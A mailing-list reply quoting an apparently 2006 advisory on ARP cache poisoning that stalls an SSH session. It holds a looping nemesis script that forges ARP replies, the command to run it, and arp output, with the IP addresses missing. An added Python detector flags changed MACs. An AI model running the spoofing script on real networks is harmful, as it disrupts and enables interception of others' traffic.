Correct me if I'm wrong, but isn't this just a trivial ARP poisoning?
If you poison an ARP table anything that happens on upper layers of
the stack (IP communications, as you are saying you poisoned) will be

How were the machines connected? Using an ethernet hub or a switch?

I don't see that as being an effective attack, actually.

On 9 May 2006 10:48:18 -0000, king_purba@xxxxxxxxxxx
<king_purba@xxxxxxxxxxx> wrote:
Author : Ph03n1X
Email : king_purba@xxxxxxxxxxx
Site :
Severity : Moderate


We know that a TCP connection is closed by sending the RST flag.
I tried to connect to my OpenSSH server on
Slackware 10 from my computer running Fedora Core 4. Then, using an
OpenBSD 3.7 box on the same network as the Slackware and Fedora machines,
I tried to overwrite the ARP cache on my Fedora Core 4 machine. After the ARP
cache has been overwritten, all packets from Fedora Core 4
to Slackware 10 are ignored. Maybe this problem is not only
on SSH but on other TCP protocols as well.

Exploitation :

1. OpenSSH on slackware has IP and MAC 00:80:48:EB:50:F2
2. Client using Fedora has IP and MAC 00:00:21:27:12:1F
3. Attacker using OpenBSD has IP and MAC 00:c0:26:6f:3a:1a
4. Now, log in via ssh from to

Before exploitation you can run shell commands on
as you wish, and you can also manage from

5. ARP cache on before overwriting

fc4-$arp -na
? ( at 00:80:48:EB:50:F2 [ether] on eth0
? ( at 00:11:BB:74:DA:00 [ether] on eth0

6. Overwriting the ARP cache on from using nemesis and a simple bash script

#!/bin/sh
# This script announces that the server's IP lives at MAC xxxx,
# so the client no longer talks to the server but to xxxx instead.

if [ -z "$5" ]; then
    echo "Usage : $0 <interface attacker> <ip server ssh> <ip client> <valid MAC address/up to u> <MAC client>"
    exit 1
fi

# Keep re-sending the forged ARP reply so the cache entry does not expire
while true; do
    nemesis arp -v -r -d "$1" -S "$2" -D "$3" -h "$4" -m "$5" -H "$4" -M "$5"
    sleep 2
done

openbsd-$./ rl0 00:c0:26:6f:3a:00 00:00:21:27:12:1f

7. Now check the ARP cache on after overwriting

fc4-$arp -na
? ( at 00:C0:26:6F:3A:00 [ether] on eth0 <-- ARP cache has been overwritten
? ( at 00:11:BB:74:DA:00 [ether] on eth0

8. Now, back to the ssh connection on from . Type any character on the ssh console: yep, no data connection, you cannot do anything on the ssh console because the ssh connection has been ignored but not closed.
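The overwrite in steps 5 and 7 leaves a clear trace on the victim: a known IP suddenly maps to a different MAC in `arp -na`. The following detector is an added example written for this thread, not code from the advisory's author or from any project it names. It parses `arp -na` output in the exact format shown above, compares a baseline snapshot with a later one, and reports any pinned host whose MAC has moved, plus any MAC that is now claimed by several IPs. The advisory's IP addresses did not survive extraction, so the embedded snapshots use 192.0.2.x placeholders (constructed); the MACs are the ones the advisory lists.

```python
import re
from typing import Dict, List, Tuple

# One line of `arp -na` output in the format shown in the advisory, e.g.
#   ? (192.0.2.10) at 00:80:48:EB:50:F2 [ether] on eth0
ARP_LINE = re.compile(
    r"^\?\s+\((?P<ip>[0-9.]+)\)\s+at\s+(?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})"
    r"\s+\[ether\]\s+on\s+(?P<iface>\S+)"
)


def parse_arp_table(text: str) -> Dict[str, str]:
    """Parse `arp -na` output into {ip: mac}; MACs are normalised to lowercase."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_arp_changes(baseline: Dict[str, str], current: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (ip, expected_mac, observed_mac) for each known host whose MAC moved.

    Hosts absent from the current table are not reported: an expired entry is
    normal. Only a *different* MAC for a known IP is the signature of the
    overwrite shown in the advisory.
    """
    changes = []
    for ip, expected in baseline.items():
        observed = current.get(ip)
        if observed is not None and observed != expected:
            changes.append((ip, expected, observed))
    return changes


def find_shared_macs(table: Dict[str, str]) -> Dict[str, List[str]]:
    """Return {mac: [ips...]} for every MAC claimed by more than one IP.

    One MAC answering for several IPs is the other tell-tale of a poisoned
    cache (a single station standing in for both the gateway and a server).
    """
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


# Constructed snapshots modelled on steps 5 and 7 of the advisory. The IPs are
# RFC 5737 documentation-range placeholders; the MACs come from the advisory.
ARP_BEFORE = """\
? (192.0.2.10) at 00:80:48:EB:50:F2 [ether] on eth0
? (192.0.2.1) at 00:11:BB:74:DA:00 [ether] on eth0
"""

ARP_AFTER = """\
? (192.0.2.10) at 00:C0:26:6F:3A:00 [ether] on eth0 <-- ARP cache has been overwritten
? (192.0.2.1) at 00:11:BB:74:DA:00 [ether] on eth0
"""


def check_snapshot(baseline_text: str, current_text: str) -> List[str]:
    """Produce one alert line per anomaly between two `arp -na` snapshots."""
    baseline = parse_arp_table(baseline_text)
    current = parse_arp_table(current_text)
    alerts = [
        f"ALERT {ip}: expected {exp}, cache now says {obs}"
        for ip, exp, obs in find_arp_changes(baseline, current)
    ]
    for mac, ips in find_shared_macs(current).items():
        alerts.append(f"ALERT {mac} is claimed by several IPs: {', '.join(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in check_snapshot(ARP_BEFORE, ARP_AFTER) or ["no ARP changes detected"]:
        print(alert)
```

In practice the baseline would be taken from a trusted moment (or from a list of hosts you pin with static entries via `arp -s`, which the kernel will not overwrite with unsolicited replies), and the current snapshot from a periodic `arp -na` run. The same check generalises beyond the single server in the advisory: any number of hosts can be in the baseline, and the shared-MAC check catches a poisoner that claims several addresses at once.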
